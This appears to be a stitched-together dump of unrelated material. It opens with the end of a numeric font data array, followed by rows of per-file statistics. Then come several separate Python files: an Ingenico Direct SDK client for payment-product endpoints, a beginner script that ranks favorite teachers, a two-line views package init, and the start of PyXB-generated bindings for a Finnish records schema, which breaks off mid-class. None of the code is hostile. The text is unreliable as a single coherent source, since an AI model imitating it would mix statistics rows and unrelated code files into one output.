(10,7,8,10,10,10,9,10,8,8,5,10,5,10,8,10,7,10,10,7,10,9,9,9,10,10,10,6,7,8,7,10,10,8,10,8,9,9,10,7,9,10,9,9,7,10,10,7,10,10,10,10,10,6,6,10,8,10,10,7,8,7,0,6,10,10,9,9,10,9,9,8,9,7,9,10,9,9,9,9,9,8,10,8,10,10,9,10,10,9,9,10,9,6,6,),
(4,2,2,4,4,4,3,4,3,2,2,4,2,4,3,3,2,4,4,2,4,3,3,3,3,4,4,2,2,3,2,2,4,2,3,2,4,3,3,1,4,4,4,4,2,4,3,2,2,4,4,2,3,2,2,4,2,4,4,2,3,1,0,2,4,4,3,3,4,3,3,3,4,2,4,4,4,4,3,2,3,3,3,2,4,2,2,4,2,4,3,4,4,1,2,),
(13,10,13,13,12,13,12,13,11,11,13,12,13,12,11,13,9,13,13,13,13,13,12,12,13,12,12,13,13,10,10,13,13,10,13,11,12,12,13,10,11,13,11,11,9,13,13,9,13,12,13,12,13,8,8,13,10,12,13,9,11,13,2,9,13,12,13,13,13,13,13,11,12,10,11,13,12,12,13,11,13,12,13,11,13,12,13,12,12,11,13,13,11,13,9,),
(8,6,9,9,8,9,8,9,6,7,9,8,9,8,6,9,5,8,8,9,9,9,8,8,9,8,8,9,9,6,6,9,8,6,9,7,8,8,9,6,7,9,7,7,5,8,9,5,9,8,9,8,9,4,4,9,6,8,9,5,7,9,0,5,9,8,9,9,9,9,9,7,8,6,7,9,8,8,9,7,9,8,9,7,9,8,9,8,8,7,9,9,7,9,5,),
(7,5,8,8,7,8,7,8,5,6,8,7,8,7,5,8,4,7,7,8,8,8,7,7,8,7,7,8,8,5,5,8,7,5,8,6,7,7,8,5,6,8,6,6,4,7,8,4,8,7,8,7,8,3,3,8,5,7,8,4,6,8,0,4,8,7,8,8,8,8,8,6,7,5,6,8,7,7,8,6,8,7,8,6,8,7,8,7,7,6,8,8,6,8,4,),
(8,6,8,9,7,9,8,9,6,5,9,7,9,8,6,9,4,8,8,9,9,9,8,8,8,7,7,9,9,5,6,9,8,5,9,5,8,8,9,6,7,9,7,7,5,8,9,5,9,7,9,7,9,4,4,9,5,7,9,5,7,9,0,5,9,8,9,9,9,9,9,7,8,6,7,9,8,8,9,7,9,7,9,7,9,7,8,7,7,6,9,9,7,9,5,),
(9,10,10,10,10,9,10,9,8,9,9,8,9,9,8,9,6,9,10,10,10,9,10,10,10,9,9,9,9,10,10,9,8,10,9,10,9,9,9,9,8,8,8,8,10,8,9,10,9,8,10,10,9,7,8,8,10,9,10,9,8,8,0,7,9,8,9,9,9,10,9,9,10,9,8,9,9,9,9,10,9,8,9,9,9,9,9,8,9,9,9,10,8,8,10,),
(8,6,9,9,9,6,8,9,6,8,4,7,4,8,4,9,4,6,7,7,9,9,6,8,9,9,9,8,9,4,7,9,7,5,9,8,8,8,9,6,7,4,7,7,5,4,9,5,9,7,7,9,9,5,5,4,3,5,9,6,7,7,0,5,9,8,8,8,8,8,9,7,8,6,7,8,8,8,8,8,8,8,9,8,9,9,9,8,9,7,8,9,7,6,5,),
(5,2,5,5,5,5,4,5,3,4,2,5,2,5,4,5,3,5,5,3,5,5,4,4,5,5,5,4,5,4,3,5,5,3,5,4,5,4,5,2,5,5,5,5,3,5,5,3,5,5,5,5,5,1,1,5,3,5,5,2,4,4,0,1,5,5,4,4,5,4,5,4,5,3,5,5,5,5,4,4,4,4,5,4,5,5,5,5,5,5,4,5,5,4,1,),
(6,6,6,6,6,6,6,6,4,4,3,6,3,6,4,5,3,6,6,6,6,5,6,6,6,6,6,3,6,4,6,5,6,5,6,6,5,5,5,3,5,6,5,5,5,6,5,6,5,6,6,6,6,3,3,6,5,6,6,4,4,6,0,2,6,6,6,6,6,6,5,5,5,3,5,6,5,5,6,4,6,4,5,4,6,3,3,6,3,5,5,6,5,6,5,),
(7,5,7,8,8,7,7,7,7,8,7,7,7,7,7,7,5,7,7,7,8,7,6,8,8,8,8,7,7,6,7,7,7,5,7,8,7,8,7,5,7,7,7,7,5,7,8,5,8,7,7,8,7,4,4,7,5,7,8,5,8,7,0,4,7,7,7,7,7,8,8,8,8,7,7,8,8,8,7,6,7,8,7,8,7,7,7,7,7,8,7,8,7,7,4,),
(8,8,9,9,9,8,8,9,6,9,9,7,9,8,5,9,4,7,8,9,9,9,8,9,9,9,9,9,9,6,8,9,7,7,9,9,8,8,9,6,7,8,7,7,7,7,9,8,9,7,8,9,9,5,5,8,7,7,9,6,7,8,0,5,9,8,9,9,9,9,9,8,9,7,7,8,9,9,9,8,9,8,9,9,9,9,9,8,9,8,9,9,7,8,7,),
(14,14,15,15,15,14,14,15,12,15,14,13,14,14,11,15,10,13,14,14,15,15,14,15,15,15,15,15,15,12,14,15,13,13,15,15,14,14,15,12,13,14,13,13,13,13,15,14,15,13,14,15,15,11,11,13,13,13,15,12,13,13,4,11,15,14,15,15,14,15,15,14,15,13,13,14,15,15,15,14,15,14,15,15,15,15,15,14,15,14,15,15,13,14,13,),
(9,6,7,9,8,9,8,9,7,8,5,9,5,9,7,8,6,9,9,5,9,8,8,8,8,9,9,6,7,7,7,7,9,7,8,8,8,8,8,6,8,9,8,8,6,9,8,6,8,9,9,8,8,4,4,9,7,9,9,5,7,5,0,5,9,9,8,8,9,8,7,7,8,6,8,9,8,8,8,7,8,7,8,8,9,7,7,9,7,8,8,9,8,5,5,),
(7,8,8,8,8,7,8,8,6,8,7,6,7,7,3,8,3,7,7,8,8,8,8,8,8,8,8,7,8,6,8,8,6,7,8,8,7,7,8,5,6,6,6,6,7,5,8,8,8,6,8,8,8,5,5,6,7,7,8,6,6,6,0,4,8,7,7,7,7,8,8,7,8,6,6,7,8,8,7,7,7,7,8,8,8,8,8,7,8,7,7,8,6,6,7,),
(8,5,7,8,8,7,7,8,6,8,6,8,6,8,7,8,5,8,8,6,8,7,7,8,8,8,8,7,7,6,7,8,8,6,8,8,7,7,8,6,7,8,7,7,5,8,8,5,8,8,7,8,8,4,4,8,6,8,8,5,7,5,0,4,8,8,7,7,7,8,7,7,8,7,7,8,8,8,7,7,7,7,8,8,8,8,7,8,8,7,7,8,7,5,4,),
(5,6,4,5,5,5,6,4,5,5,3,5,3,5,4,3,6,5,6,6,6,3,6,5,5,5,5,2,3,4,6,3,4,6,3,3,6,6,3,3,5,4,6,5,6,4,4,6,4,6,6,2,4,6,6,4,6,5,6,5,4,3,0,5,5,4,3,3,3,6,4,5,6,3,5,5,5,5,3,3,3,3,4,4,3,2,2,4,2,5,5,6,6,3,6,),
(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,),
(4,4,4,4,4,4,4,5,3,3,3,4,3,4,2,5,4,4,4,4,4,5,4,4,4,4,4,5,3,4,4,5,4,4,5,4,4,4,5,2,3,4,4,3,4,4,5,4,5,4,4,4,5,4,4,4,4,4,5,3,3,3,0,3,5,4,5,5,4,4,5,3,4,2,3,4,4,4,5,3,5,3,5,3,4,3,3,4,3,3,5,5,4,3,4,),
(10,8,10,9,8,10,10,11,8,4,11,9,11,10,7,11,6,8,10,11,9,11,9,9,10,9,9,11,9,3,8,11,8,7,11,7,10,10,11,8,9,10,9,9,7,8,11,7,11,9,10,6,11,6,6,9,4,7,11,7,9,10,0,7,11,10,11,11,11,11,11,9,10,8,9,10,10,10,11,9,11,9,11,9,10,9,8,8,9,6,11,11,9,10,7,),
(3,4,3,4,3,3,4,3,3,3,0,2,0,3,0,2,4,3,4,4,4,2,4,4,3,2,2,0,0,4,4,1,0,4,2,3,4,4,2,1,3,0,4,3,4,1,2,4,3,4,4,3,3,4,4,1,4,2,4,3,2,0,0,3,0,2,0,0,0,4,0,3,4,1,2,3,0,2,0,0,0,0,0,2,0,0,0,0,0,2,3,4,4,0,4,),
)
# End of font
| 31.296148
| 291
| 0.378241
| 14,922
| 77,990
| 1.976411
| 0.023187
| 0.311135
| 0.395497
| 0.446494
| 0.752102
| 0.640852
| 0.531195
| 0.434898
| 0.3642
| 0.303811
| 0
| 0.477624
| 0.41981
| 77,990
| 2,491
| 292
| 31.308711
| 0.174103
| 0.29173
| 0
| 0.798866
| 1
| 0
| 0.000227
| 0
| 0
| 0
| 0.242644
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2d9b0e5e2cc43e83c0fcf917c67f7873ea2b1d61
| 9,543
|
py
|
Python
|
ingenico/direct/sdk/merchant/products/products_client.py
|
Ingenico/direct-sdk-python2
|
1c5c08fe2281aa99bfe8e8e031071600cb3be11d
|
[
"Apache-2.0"
] | null | null | null |
ingenico/direct/sdk/merchant/products/products_client.py
|
Ingenico/direct-sdk-python2
|
1c5c08fe2281aa99bfe8e8e031071600cb3be11d
|
[
"Apache-2.0"
] | null | null | null |
ingenico/direct/sdk/merchant/products/products_client.py
|
Ingenico/direct-sdk-python2
|
1c5c08fe2281aa99bfe8e8e031071600cb3be11d
|
[
"Apache-2.0"
] | null | null | null |
#
# This class was auto-generated from the API references found at
# https://support.direct.ingenico.com/documentation/api/reference/
#
from ingenico.direct.sdk.api_resource import ApiResource
from ingenico.direct.sdk.response_exception import ResponseException
from ingenico.direct.sdk.domain.error_response import ErrorResponse
from ingenico.direct.sdk.domain.get_payment_products_response import GetPaymentProductsResponse
from ingenico.direct.sdk.domain.payment_product import PaymentProduct
from ingenico.direct.sdk.domain.payment_product_networks_response import PaymentProductNetworksResponse
from ingenico.direct.sdk.domain.product_directory import ProductDirectory
from ingenico.direct.sdk.merchant.products.i_products_client import IProductsClient
class ProductsClient(ApiResource, IProductsClient):
    """
    Products client. Thread-safe.

    All four operations are plain GET calls that share identical
    error-translation logic, centralized in :meth:`_execute_get`.
    """

    def __init__(self, parent, path_context):
        """
        :param parent: :class:`ingenico.direct.sdk.api_resource.ApiResource`
        :param path_context: dict[str, str]
        """
        super(ProductsClient, self).__init__(parent, path_context)

    def _execute_get(self, uri, query, response_type, context):
        """
        Execute a GET call and translate an error response into the
        appropriate SDK exception.

        :param uri: str, the fully instantiated resource URI
        :param query: the operation's query-parameter object
        :param response_type: class to unmarshal a successful response into
        :param context: :class:`ingenico.direct.sdk.call_context.CallContext` or None
        """
        try:
            return self._communicator.get(
                uri,
                self._client_headers,
                query,
                response_type,
                context)
        except ResponseException as e:
            # Unmarshal the error body so _create_exception can raise the
            # exception type matching the HTTP status code.
            error_object = self._communicator.marshaller.unmarshal(e.body, ErrorResponse)
            raise self._create_exception(e.status_code, e.body, error_object, context)

    def get_payment_products(self, query, context=None):
        """
        Resource /v2/{merchantId}/products - Get payment products

        See also https://support.direct.ingenico.com/documentation/api/reference#operation/GetPaymentProducts

        :param query: :class:`ingenico.direct.sdk.merchant.products.get_payment_products_params.GetPaymentProductsParams`
        :param context: :class:`ingenico.direct.sdk.call_context.CallContext`
        :return: :class:`ingenico.direct.sdk.domain.get_payment_products_response.GetPaymentProductsResponse`
        :raise: ValidationException if the request was not correct and couldn't be processed (HTTP status code 400)
        :raise: AuthorizationException if the request was not allowed (HTTP status code 403)
        :raise: ReferenceException if an object was attempted to be referenced that doesn't exist or has been removed,
                or there was a conflict (HTTP status code 404, 409 or 410)
        :raise: DirectException if something went wrong at the Ingenico ePayments platform,
                the Ingenico ePayments platform was unable to process a message from a downstream partner/acquirer,
                or the service that you're trying to reach is temporary unavailable (HTTP status code 500, 502 or 503)
        :raise: ApiException if the Ingenico ePayments platform returned any other error
        """
        uri = self._instantiate_uri("/v2/{merchantId}/products", None)
        return self._execute_get(uri, query, GetPaymentProductsResponse, context)

    def get_payment_product(self, payment_product_id, query, context=None):
        """
        Resource /v2/{merchantId}/products/{paymentProductId} - Get payment product

        See also https://support.direct.ingenico.com/documentation/api/reference#operation/GetPaymentProduct

        :param payment_product_id: int
        :param query: :class:`ingenico.direct.sdk.merchant.products.get_payment_product_params.GetPaymentProductParams`
        :param context: :class:`ingenico.direct.sdk.call_context.CallContext`
        :return: :class:`ingenico.direct.sdk.domain.payment_product.PaymentProduct`
        :raise: ValidationException if the request was not correct and couldn't be processed (HTTP status code 400)
        :raise: AuthorizationException if the request was not allowed (HTTP status code 403)
        :raise: ReferenceException if an object was attempted to be referenced that doesn't exist or has been removed,
                or there was a conflict (HTTP status code 404, 409 or 410)
        :raise: DirectException if something went wrong at the Ingenico ePayments platform,
                the Ingenico ePayments platform was unable to process a message from a downstream partner/acquirer,
                or the service that you're trying to reach is temporary unavailable (HTTP status code 500, 502 or 503)
        :raise: ApiException if the Ingenico ePayments platform returned any other error
        """
        path_context = {
            "paymentProductId": str(payment_product_id),
        }
        uri = self._instantiate_uri("/v2/{merchantId}/products/{paymentProductId}", path_context)
        return self._execute_get(uri, query, PaymentProduct, context)

    def get_product_directory(self, payment_product_id, query, context=None):
        """
        Resource /v2/{merchantId}/products/{paymentProductId}/directory - Get payment product directory

        See also https://support.direct.ingenico.com/documentation/api/reference#operation/GetProductDirectoryApi

        :param payment_product_id: int
        :param query: :class:`ingenico.direct.sdk.merchant.products.get_product_directory_params.GetProductDirectoryParams`
        :param context: :class:`ingenico.direct.sdk.call_context.CallContext`
        :return: :class:`ingenico.direct.sdk.domain.product_directory.ProductDirectory`
        :raise: ValidationException if the request was not correct and couldn't be processed (HTTP status code 400)
        :raise: AuthorizationException if the request was not allowed (HTTP status code 403)
        :raise: ReferenceException if an object was attempted to be referenced that doesn't exist or has been removed,
                or there was a conflict (HTTP status code 404, 409 or 410)
        :raise: DirectException if something went wrong at the Ingenico ePayments platform,
                the Ingenico ePayments platform was unable to process a message from a downstream partner/acquirer,
                or the service that you're trying to reach is temporary unavailable (HTTP status code 500, 502 or 503)
        :raise: ApiException if the Ingenico ePayments platform returned any other error
        """
        path_context = {
            "paymentProductId": str(payment_product_id),
        }
        uri = self._instantiate_uri("/v2/{merchantId}/products/{paymentProductId}/directory", path_context)
        return self._execute_get(uri, query, ProductDirectory, context)

    def get_payment_product_networks(self, payment_product_id, query, context=None):
        """
        Resource /v2/{merchantId}/products/{paymentProductId}/networks - Get payment product networks

        See also https://support.direct.ingenico.com/documentation/api/reference#operation/GetPaymentProductNetworks

        :param payment_product_id: int
        :param query: :class:`ingenico.direct.sdk.merchant.products.get_payment_product_networks_params.GetPaymentProductNetworksParams`
        :param context: :class:`ingenico.direct.sdk.call_context.CallContext`
        :return: :class:`ingenico.direct.sdk.domain.payment_product_networks_response.PaymentProductNetworksResponse`
        :raise: ValidationException if the request was not correct and couldn't be processed (HTTP status code 400)
        :raise: AuthorizationException if the request was not allowed (HTTP status code 403)
        :raise: ReferenceException if an object was attempted to be referenced that doesn't exist or has been removed,
                or there was a conflict (HTTP status code 404, 409 or 410)
        :raise: DirectException if something went wrong at the Ingenico ePayments platform,
                the Ingenico ePayments platform was unable to process a message from a downstream partner/acquirer,
                or the service that you're trying to reach is temporary unavailable (HTTP status code 500, 502 or 503)
        :raise: ApiException if the Ingenico ePayments platform returned any other error
        """
        path_context = {
            "paymentProductId": str(payment_product_id),
        }
        uri = self._instantiate_uri("/v2/{merchantId}/products/{paymentProductId}/networks", path_context)
        return self._execute_get(uri, query, PaymentProductNetworksResponse, context)
| 57.487952
| 136
| 0.693807
| 1,085
| 9,543
| 5.97788
| 0.141935
| 0.045328
| 0.055042
| 0.044095
| 0.836263
| 0.811903
| 0.803423
| 0.78338
| 0.752852
| 0.752852
| 0
| 0.014272
| 0.236404
| 9,543
| 165
| 137
| 57.836364
| 0.875806
| 0.554019
| 0
| 0.638889
| 1
| 0
| 0.060443
| 0.047491
| 0
| 0
| 0
| 0
| 0
| 1
| 0.069444
| false
| 0
| 0.111111
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2da9a9aa6872adbb1b86902149cef19d1397d81e
| 2,539
|
py
|
Python
|
Favorite_Teacher/main.py
|
RobertElias/PythonProjects
|
9dcf24bdd6b31ad94cfab6cf81caf7fdc0f8023a
|
[
"MIT"
] | null | null | null |
Favorite_Teacher/main.py
|
RobertElias/PythonProjects
|
9dcf24bdd6b31ad94cfab6cf81caf7fdc0f8023a
|
[
"MIT"
] | null | null | null |
Favorite_Teacher/main.py
|
RobertElias/PythonProjects
|
9dcf24bdd6b31ad94cfab6cf81caf7fdc0f8023a
|
[
"MIT"
] | null | null | null |
# Interactive program: build a ranked list of favorite teachers, then
# demonstrate list operations (append, insert, remove) on it.
print("Welcome to the Favorite Teachers Program")
fav_teachers = []


def _print_summary(teachers):
    """Print ranked, alphabetical, reversed, top/next-two and count views of *teachers*."""
    print("\nYour favorite teachers ranked are: " + str(teachers))
    print("Your favorite teachers alphabetically are: " + str(sorted(teachers)))
    print("Your favorite teachers in reverse are: " + str(sorted(teachers, reverse=True)))
    print("\nYour top two favorite teachers are: " + teachers[0] + " and " + teachers[1] + ".")
    print("Your next two favorite teachers are: " + teachers[2] + " and " + teachers[3] + ".")
    print("Your last favorite teacher is: " + teachers[-1])
    print("You have a total of: " + str(len(teachers)) + " favorite teachers.")


# Get user input; .title() normalizes the capitalization of each name.
for ordinal in ("first", "second", "third", "fourth"):
    fav_teachers.append(input("Who is your " + ordinal + " favorite teacher: ").title())

# Summary of list
_print_summary(fav_teachers)

# Insert a new favorite teacher at the top of the ranking (list grows to 5).
fav_teachers.insert(0, input("\nOops, " + fav_teachers[0] + " is no longer your first favorite teacher. Who is your new Favorite Teacher: ").title())

# Summary of list
_print_summary(fav_teachers)

# Remove a specific teacher.
# NOTE(review): list.remove raises ValueError if the entered name is not in
# the list — the input is assumed to match an existing entry exactly.
fav_teachers.remove(input("\nYou decide you no longer like a teacher. Who do we remove from the list: ").title())

# Summary of list
_print_summary(fav_teachers)
| 45.339286
| 148
| 0.705002
| 360
| 2,539
| 4.875
| 0.166667
| 0.219373
| 0.054701
| 0.064957
| 0.831339
| 0.831339
| 0.831339
| 0.813675
| 0.813675
| 0.813675
| 0
| 0.007892
| 0.151635
| 2,539
| 55
| 149
| 46.163636
| 0.806871
| 0.044506
| 0
| 0.685714
| 0
| 0
| 0.484711
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.628571
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
2da9f101a86a0287688cb22d3a503cd73161d7ea
| 67
|
py
|
Python
|
meetup/views/__init__.py
|
BradleyKirton/gpug-graphql
|
ebcd53e48773801d3908d11bcc4c039a259dc04b
|
[
"MIT"
] | null | null | null |
meetup/views/__init__.py
|
BradleyKirton/gpug-graphql
|
ebcd53e48773801d3908d11bcc4c039a259dc04b
|
[
"MIT"
] | 3
|
2020-06-05T18:19:29.000Z
|
2021-06-10T20:23:21.000Z
|
meetup/views/__init__.py
|
BradleyKirton/gpug-graphql
|
ebcd53e48773801d3908d11bcc4c039a259dc04b
|
[
"MIT"
] | null | null | null |
from meetup.views.api import *
from meetup.views.template import *
| 22.333333
| 35
| 0.791045
| 10
| 67
| 5.3
| 0.6
| 0.377358
| 0.566038
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.119403
| 67
| 2
| 36
| 33.5
| 0.898305
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
2df6380e95f4b2a8ceac071ba64f386ca9dbd03c
| 249,372
|
py
|
Python
|
metarecord/binding/jhs.py
|
kerkkoheiskanen/helerm
|
bdaf801a940d42325a1076b42bb0edef831fbac9
|
[
"MIT"
] | 2
|
2017-04-21T15:36:23.000Z
|
2020-12-04T09:32:39.000Z
|
metarecord/binding/jhs.py
|
kerkkoheiskanen/helerm
|
bdaf801a940d42325a1076b42bb0edef831fbac9
|
[
"MIT"
] | 168
|
2016-10-05T12:58:41.000Z
|
2021-08-31T14:29:56.000Z
|
metarecord/binding/jhs.py
|
kerkkoheiskanen/helerm
|
bdaf801a940d42325a1076b42bb0edef831fbac9
|
[
"MIT"
] | 7
|
2016-10-13T12:51:36.000Z
|
2021-01-21T13:05:04.000Z
|
# ./metarecord/binding/jhs.py
# -*- coding: utf-8 -*-
# PyXB bindings for NM:0bcf4fe07fa483312851437fc9b3f33582a4d3fa
# Generated 2020-04-06 06:44:21.533676 by PyXB version 1.2.6 using Python 3.6.10.final.0
# Namespace http://skeemat.jhs-suositukset.fi/tos/2015/01/15
from __future__ import unicode_literals
import pyxb
import pyxb.binding
import pyxb.binding.saxer
import io
import pyxb.utils.utility
import pyxb.utils.domutils
import sys
import pyxb.utils.six as _six
# Unique identifier for bindings created at the same time
_GenerationUID = pyxb.utils.utility.UniqueIdentifier('urn:uuid:0bd4d60e-77d2-11ea-a270-0242c0a80003')

# Version of PyXB used to generate the bindings
_PyXBVersion = '1.2.6'
# Generated bindings are not compatible across PyXB versions; fail fast at
# import time rather than with obscure runtime errors later.
if pyxb.__version__ != _PyXBVersion:
    raise pyxb.PyXBVersionError(_PyXBVersion)

# A holder for module-level binding classes so we can access them from
# inside class definitions where property names may conflict.
_module_typeBindings = pyxb.utils.utility.Object()

# Import bindings for namespaces imported into schema
import pyxb.binding.datatypes
import metarecord.binding._jhs as _ImportedBinding_metarecord_binding__jhs

# NOTE: All namespace declarations are reserved within the binding.
# The Namespace object is the registry every generated type below attaches
# itself to via addCategoryObject.
Namespace = pyxb.namespace.NamespaceForURI('http://skeemat.jhs-suositukset.fi/tos/2015/01/15', create_if_missing=True)
Namespace.configureCategories(['typeBinding', 'elementBinding'])
def CreateFromDocument (xml_text, default_namespace=None, location_base=None):
    """Build a binding instance from an XML document.

    Parses *xml_text* — data (Python 2 str or Python 3 bytes) or text
    (Python 2 unicode or Python 3 str) in the L{pyxb._InputEncoding}
    encoding — and returns the Python instance created from its document
    element.

    @keyword default_namespace: The L{pyxb.Namespace} instance used where
        the document declares no default namespace.  When C{None}, the
        namespace of this module is used.
    @keyword location_base: An object recorded as the base of all
        L{pyxb.utils.utility.Location} instances associated with events and
        objects handled by the parser, e.g. the URI the document came from.
    """
    # Fall back to the DOM code path when the runtime is not configured
    # for SAX-style parsing.
    if pyxb._XMLStyle != pyxb.XMLStyle_saxer:
        dom = pyxb.utils.domutils.StringToDOM(xml_text)
        return CreateFromDOM(dom.documentElement, default_namespace=default_namespace)
    if default_namespace is None:
        default_namespace = Namespace.fallbackNamespace()
    parser = pyxb.binding.saxer.make_parser(fallback_namespace=default_namespace, location_base=location_base)
    content_handler = parser.getContentHandler()
    data = xml_text
    if isinstance(data, _six.text_type):
        # The SAX parser consumes bytes; encode text input first.
        data = data.encode(pyxb._InputEncoding)
    parser.parse(io.BytesIO(data))
    return content_handler.rootObject()
def CreateFromDOM (node, default_namespace=None):
    """Build a Python instance from the given DOM node.

    The node tag must correspond to an element declaration in this module.

    @deprecated: Forcing use of DOM interface is unnecessary; use L{CreateFromDocument}."""
    ns = Namespace.fallbackNamespace() if default_namespace is None else default_namespace
    return pyxb.binding.basis.element.AnyCreateFromDOM(node, ns)
# Atomic simple type: {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}idTyyppi
# (Finnish doc: unique id of a structure part; no format is specified.)
class idTyyppi (pyxb.binding.datatypes.string):
    """Rakenneosan yksilöivä id-tunnus. Formaattia ei ole määritelty."""
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'idTyyppi')
    _XSDLocation = None
    _Documentation = 'Rakenneosan yksilöivä id-tunnus. Formaattia ei ole määritelty.'
idTyyppi._InitializeFacetMap()
Namespace.addCategoryObject('typeBinding', 'idTyyppi', idTyyppi)
_module_typeBindings.idTyyppi = idTyyppi

# Atomic simple type: {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}kieliKoodiTyyppi
# (Finnish doc: language code letting an element appear in several languages;
# standard codes such as fi, se, en are recommended.)
class kieliKoodiTyyppi (pyxb.binding.datatypes.string):
    """Kielikoodin avulla elementti voi ilmetä usealla eri kielellä. Suositellaan käytettäväksi standardeja kielikoodeja (fi, se, en). """
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'kieliKoodiTyyppi')
    _XSDLocation = None
    _Documentation = 'Kielikoodin avulla elementti voi ilmetä usealla eri kielellä. Suositellaan käytettäväksi standardeja kielikoodeja (fi, se, en).\t\t'
kieliKoodiTyyppi._InitializeFacetMap()
Namespace.addCategoryObject('typeBinding', 'kieliKoodiTyyppi', kieliKoodiTyyppi)
_module_typeBindings.kieliKoodiTyyppi = kieliKoodiTyyppi

# Atomic simple type: {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}tilaKoodiTyyppi
# Status code restricted to the enumerated values '1'..'5'.
class tilaKoodiTyyppi (pyxb.binding.datatypes.integer, pyxb.binding.basis.enumeration_mixin):
    """An atomic simple type."""
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'tilaKoodiTyyppi')
    _XSDLocation = None
    _Documentation = None
tilaKoodiTyyppi._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=tilaKoodiTyyppi, enum_prefix=None)
tilaKoodiTyyppi._CF_enumeration.addEnumeration(unicode_value='1', tag=None)
tilaKoodiTyyppi._CF_enumeration.addEnumeration(unicode_value='2', tag=None)
tilaKoodiTyyppi._CF_enumeration.addEnumeration(unicode_value='3', tag=None)
tilaKoodiTyyppi._CF_enumeration.addEnumeration(unicode_value='4', tag=None)
tilaKoodiTyyppi._CF_enumeration.addEnumeration(unicode_value='5', tag=None)
tilaKoodiTyyppi._InitializeFacetMap(tilaKoodiTyyppi._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'tilaKoodiTyyppi', tilaKoodiTyyppi)
_module_typeBindings.tilaKoodiTyyppi = tilaKoodiTyyppi

# Atomic simple type: {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}versioTyyppi
class versioTyyppi (pyxb.binding.datatypes.string):
    """An atomic simple type."""
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'versioTyyppi')
    _XSDLocation = None
    _Documentation = None
versioTyyppi._InitializeFacetMap()
Namespace.addCategoryObject('typeBinding', 'versioTyyppi', versioTyyppi)
_module_typeBindings.versioTyyppi = versioTyyppi

# Atomic simple type: {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}luokitustunnusTyyppi
# (Finnish doc: when shared public-administration classifications are used,
# the identifier must follow the shared classification.)
class luokitustunnusTyyppi (pyxb.binding.datatypes.string):
    """Käytettäessä julkisen hallinnon yhteisiä luokituksia, tunnuksena pitää käyttää yhteisen luokituksen mukaista tunnusta."""
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'luokitustunnusTyyppi')
    _XSDLocation = None
    _Documentation = 'Käytettäessä julkisen hallinnon yhteisiä luokituksia, tunnuksena pitää käyttää yhteisen luokituksen mukaista tunnusta.'
luokitustunnusTyyppi._InitializeFacetMap()
Namespace.addCategoryObject('typeBinding', 'luokitustunnusTyyppi', luokitustunnusTyyppi)
_module_typeBindings.luokitustunnusTyyppi = luokitustunnusTyyppi

# Atomic simple type: {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}nimekeTekstiTyyppi
class nimekeTekstiTyyppi (pyxb.binding.datatypes.string):
    """An atomic simple type."""
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'nimekeTekstiTyyppi')
    _XSDLocation = None
    _Documentation = None
nimekeTekstiTyyppi._InitializeFacetMap()
Namespace.addCategoryObject('typeBinding', 'nimekeTekstiTyyppi', nimekeTekstiTyyppi)
_module_typeBindings.nimekeTekstiTyyppi = nimekeTekstiTyyppi

# Atomic simple type: {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}kuvausTekstiTyyppi
class kuvausTekstiTyyppi (pyxb.binding.datatypes.string):
    """An atomic simple type."""
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'kuvausTekstiTyyppi')
    _XSDLocation = None
    _Documentation = None
kuvausTekstiTyyppi._InitializeFacetMap()
Namespace.addCategoryObject('typeBinding', 'kuvausTekstiTyyppi', kuvausTekstiTyyppi)
_module_typeBindings.kuvausTekstiTyyppi = kuvausTekstiTyyppi

# Atomic simple type: {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}lisatiedotTekstiTyyppi
class lisatiedotTekstiTyyppi (pyxb.binding.datatypes.string):
    """An atomic simple type."""
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'lisatiedotTekstiTyyppi')
